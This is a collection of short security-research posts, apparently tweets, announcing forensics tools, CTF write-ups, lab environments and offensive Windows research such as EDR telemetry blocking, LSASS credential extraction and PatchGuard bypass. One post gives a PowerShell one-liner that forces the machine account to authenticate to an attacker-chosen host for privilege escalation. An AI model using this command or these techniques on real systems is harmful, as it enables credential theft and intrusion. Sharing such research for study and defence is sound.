Time to make volatility 3 compatible with modern Windows hibernation file analysis. Blog post : forensicxlab.com/posts/hibernat… Feature : tinyurl.com/5n8u4nr9 Special thanks to Chad Tilbury who gave me the motivation and Joe Sylve 🐘 @[email protected], Vico Marziale, Golden G. Richard III for the incredible work

I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/Covena… [1] Recovering PDF using DataRun of $LogFile > naacbin.gitlab.io/data-on-the-ru… [2] Decrypt empire C2 communication by extracting private key from memory > naacbin.gitlab.io/empire-c2/

Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/rev…

Exegol holiday release is live 🎄🎁🎅 New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things! github.com/ThePorgs/Exego… github.com/ThePorgs/Exego… gg to the team Dramelac QU35T 👏 and all contributors.

OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. Considered it so evil that we didn't publish it that time. It was pointless, now here it is by Chris Au: github.com/netero1010/EDR…

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Challenge time is now over ⏰ TL;DR - HTML injection - Axios DOM Based CSPP - Axios CSPP response overwrite gadget - jQuery DOM Clobbering + CSPP selector overwrite gadgets - Setting src attr to "javascript:" for each HTML node ➝ XSS Detailed writeup 👇 mizu.re/post/intigriti…

I did two write-ups about ETW. The first one will cover how to capture an ETW trace and covers a case-study using the WinInet provider to analyze Cobalt Strike. The second one covers how EDR are using the DotNetRuntime ETW. 1. github.com/DebugPrivilege… 2. github.com/DebugPrivilege…

I documented github.com/corkami/docs/b… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/b…) around 2009 but I'm pretty sure this was known before. Any early case of ITW low-align PE ? cc Adam qkumba hasherezade ReWolf

Over the past few months, I've contributed on the github.com/mandiant/VM-Pa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab

I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/…

New lab 🏰 for the GOAD project 🥳: SCCM You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware. More information here: mayfly277.github.io/posts/SCCM-LAB… Repository here : github.com/Orange-Cyberde… Thx again Kenji Endo for your help to building this !

Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb. 1/8

I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tu…

Here is my #Friday #giveaways! Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware academy.cyber5w.com/courses/C5W-Ce…

I just published a blog and tool for the LSA Whisperer work that was presented at the SpecterOps Conference (SOCON) back in March. If you are interested in getting credentials from LSASS without accessing its memory, check it out! medium.com/specter-ops-po…

I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver. blog.slowerzs.net/posts/pplsyste…

Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Resear… That's huge news from my perspective🔥

Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc…

I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API